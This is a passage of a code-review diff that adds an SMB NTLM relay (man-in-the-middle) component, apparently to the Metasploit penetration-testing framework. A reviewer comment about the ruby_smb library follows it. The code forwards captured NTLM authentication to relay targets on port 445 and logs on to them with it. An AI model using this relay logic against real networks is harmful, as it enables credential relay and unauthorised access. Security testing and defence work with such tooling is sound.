lib/msf/core/exploit/remote/smb/mitm/mitm_server_client.rb

```diff
@@ -0,0 +1,379 @@
+      elsif ntlm_message.is_a?(::Net::NTLM::Message::Type2)
+        RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_NO_SUCH_LOGON_SESSION)
+
+      # NTLM challenge response
+      elsif ntlm_message.is_a?(::Net::NTLM::Message::Type3)
+        relayed_connection = session.metadata[:relayed_connection]
+
+        resp = relayed_connection.send_auth_attempt(incoming_security_buffer)
+
+        if resp.smb2_header.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
+          logger.debug("Successfully authenticated against relay target")
+
+          @listener.on_ntlm_type3(
+            address: relayed_connection.target.ip,
+            challenge: session.metadata[:relay_target_server_challenge],
+            # TODO: Looks like this isn't implemented correctly in the original implementation
+            client_os_version: nil,
+            ntlm_message: ntlm_message
+          )
+          @listener.on_relay_success(relayed_connection)
+        else
+          logger.debug("Failed authenticating against relay target")
+          @listener.on_relay_failure(relayed_connection)
+          session.metadata.delete(:relay_mode)
+          relayed_connection.logoff!
+        end
+
+        RubySMB::Gss::Provider::Result.new(nil, resp.smb2_header.nt_status)
+
+      # Should never occur
+      else
+        logger.error("Invalid ntlm request")
+        RubySMB::Gss::Provider::Result.new(nil, WindowsError::NTStatus::STATUS_NO_SUCH_LOGON_SESSION)
+      end
+    end
+
+    def create_mitm_client(target, timeout)
+      sock = Rex::Socket::Tcp.create(
+        'PeerHost' => target.ip,
+        'PeerPort' => target.port,
+        'Server' => false,
+        'Timeout' => timeout,
+        'Context' =>
+          {
+            'Caller' => self
+          }
+      )
+
+      dispatcher = RubySMB::Dispatcher::Socket.new(sock)
+      client = MITMClient.new(dispatcher, provider: self, username: '', password: '',
+                              smb1: false, smb2: true, smb3: true, target: target, always_encrypt: false)
+
+      client
+    rescue ::Exception => e
+      msg = "Unable to create relay to #{peer_host}:#{peer_port}"
+      elog(msg, error: e)
+      print_warning msg
+    end
+  end
+
+  class Target
+    def initialize(ip, port, protocol)
+      @ip = ip
+      @port = port
+      @protocol = protocol
+    end
+
+    attr_reader :ip, :port, :protocol
+  end
+
+  # A thread safe target list. The provided targets will be iterated over via the {next} method.
+  class TargetList
+    include MonitorMixin
+
+    # @param [Array<String>] targets
+    def initialize(targets)
+      super()
+      @walker = Rex::Socket::RangeWalker.new(targets)
+    end
+
+    # Return the next available target, or nil
+    def next
+      synchronize do
+        # TODO: Confirm HTTP relay semantics
+        Target.new(@walker.next_ip, 445, :smb)
+      end
+    end
+  end
+
+  class MITMClient < ::RubySMB::Client
```

Comment:
Longer term I would love to be able to delete this SMB override, and update `ruby_smb` to handle these use cases directly without the extra logic tweaks